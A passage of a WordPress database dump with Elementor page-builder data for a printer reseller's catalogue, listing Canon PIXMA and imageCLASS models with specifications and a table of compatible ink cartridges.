Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6884,3297,'_wp_page_template','template-fullwidth.php'),(6899,3299,'_wp_page_template','template-fullwidth.php'),(6892,3298,'_wp_page_template','template-fullwidth.php'),(6893,3298,'_elementor_edit_mode','builder'),(6894,3298,'_elementor_template_type','post'),(6895,3298,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td 